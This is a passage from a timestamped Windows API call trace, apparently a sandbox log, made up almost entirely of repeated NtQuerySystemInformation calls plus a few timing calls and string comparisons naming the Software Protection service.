[0236.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d970, Length=0x20, ResultLength=0x0) [0236.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d970, Length=0x20, ResultLength=0x0) [0236.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d970, Length=0x20, ResultLength=0x0) [0236.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db70, Length=0x38, ResultLength=0x0) [0236.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9f0, Length=0x20, ResultLength=0x0) [0236.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d980, Length=0x20, ResultLength=0x0) [0236.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d980, Length=0x20, ResultLength=0x0) [0236.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7df58, Length=0x50, ResultLength=0x0) [0236.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ded0, Length=0x28, ResultLength=0x0) [0236.960] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0236.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7df58, Length=0x50, ResultLength=0x0) [0236.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7df58, Length=0x50, ResultLength=0x0) [0236.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de40, Length=0x50, ResultLength=0x0) [0236.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddc0, Length=0x28, ResultLength=0x0) [0236.960] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0236.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de40, Length=0x50, ResultLength=0x0) [0236.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de40, Length=0x50, ResultLength=0x0) [0236.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de40, Length=0x50, ResultLength=0x0) [0236.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd70, Length=0x38, ResultLength=0x0) [0236.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dba0, Length=0x28, ResultLength=0x0) [0236.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dba0, Length=0x28, ResultLength=0x0) [0236.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dba0, Length=0x28, ResultLength=0x0) [0236.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc10, Length=0x28, ResultLength=0x0) [0236.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd70, Length=0x38, ResultLength=0x0) [0236.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc90, Length=0x28, ResultLength=0x0) [0236.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc90, Length=0x28, ResultLength=0x0) [0236.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd70, Length=0x38, ResultLength=0x0) [0236.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbf0, Length=0x20, ResultLength=0x0) [0236.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db70, Length=0x20, ResultLength=0x0) [0236.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db70, Length=0x20, ResultLength=0x0) [0236.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db70, Length=0x20, ResultLength=0x0) [0236.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd70, Length=0x38, ResultLength=0x0) [0236.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbf0, Length=0x20, ResultLength=0x0) [0236.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db80, Length=0x20, ResultLength=0x0) [0236.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db80, Length=0x20, ResultLength=0x0) [0236.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.976] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751f7dea0 | out: lpSystemTimeAsFileTime=0xc751f7dea0*(dwLowDateTime=0xee870575, dwHighDateTime=0x1d5fb6e)) [0236.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7df58, Length=0x50, ResultLength=0x0) [0236.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de90, Length=0x28, ResultLength=0x0) [0236.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dda8, Length=0x50, ResultLength=0x0) [0236.977] GetTickCount () returned 0x117bc1f [0236.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc78, Length=0x58, ResultLength=0x0) [0236.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x38, ResultLength=0x0) [0236.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x28, ResultLength=0x0) [0236.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x28, ResultLength=0x0) [0236.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x28, ResultLength=0x0) [0236.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x28, ResultLength=0x0) [0236.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x28, ResultLength=0x0) [0236.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x38, ResultLength=0x0) [0236.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dab0, Length=0x28, ResultLength=0x0) [0236.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dab0, Length=0x28, ResultLength=0x0) [0236.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x38, ResultLength=0x0) [0236.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da10, Length=0x20, ResultLength=0x0) [0236.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x20, ResultLength=0x0) [0236.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x20, ResultLength=0x0) [0236.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x20, ResultLength=0x0) [0236.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x38, ResultLength=0x0) [0236.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da10, Length=0x20, ResultLength=0x0) [0236.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9a0, Length=0x20, ResultLength=0x0) [0236.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9a0, Length=0x20, ResultLength=0x0) [0236.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc78, Length=0x58, ResultLength=0x0) [0236.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db50, Length=0x38, ResultLength=0x0) [0236.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x28, ResultLength=0x0) [0236.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x28, ResultLength=0x0) [0236.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x28, ResultLength=0x0) [0236.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x28, ResultLength=0x0) [0236.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da00, Length=0x28, ResultLength=0x0) [0236.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db50, Length=0x38, ResultLength=0x0) [0236.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db50, Length=0x38, ResultLength=0x0) [0236.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da80, Length=0x28, ResultLength=0x0) [0236.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da80, Length=0x28, ResultLength=0x0) [0236.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db50, Length=0x38, ResultLength=0x0) [0237.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db50, Length=0x38, ResultLength=0x0) [0237.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8f0, Length=0x20, ResultLength=0x0) [0237.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x20, ResultLength=0x0) [0237.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x20, ResultLength=0x0) [0237.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x20, ResultLength=0x0) [0237.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dac0, Length=0x20, ResultLength=0x0) [0237.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db50, Length=0x38, ResultLength=0x0) [0237.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9e0, Length=0x20, ResultLength=0x0) [0237.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x20, ResultLength=0x0) [0237.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x20, ResultLength=0x0) [0237.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x20, ResultLength=0x0) [0237.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db50, Length=0x38, ResultLength=0x0) [0237.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9e0, Length=0x20, ResultLength=0x0) [0237.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x20, ResultLength=0x0) [0237.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x20, ResultLength=0x0) [0237.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x20, ResultLength=0x0) [0237.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db50, Length=0x38, ResultLength=0x0) [0237.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9e0, Length=0x20, ResultLength=0x0) [0237.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d970, Length=0x20, ResultLength=0x0) [0237.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d970, Length=0x20, ResultLength=0x0) [0237.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.004] NtQuerySystemInformation (SystemInformationClass=0xb9, 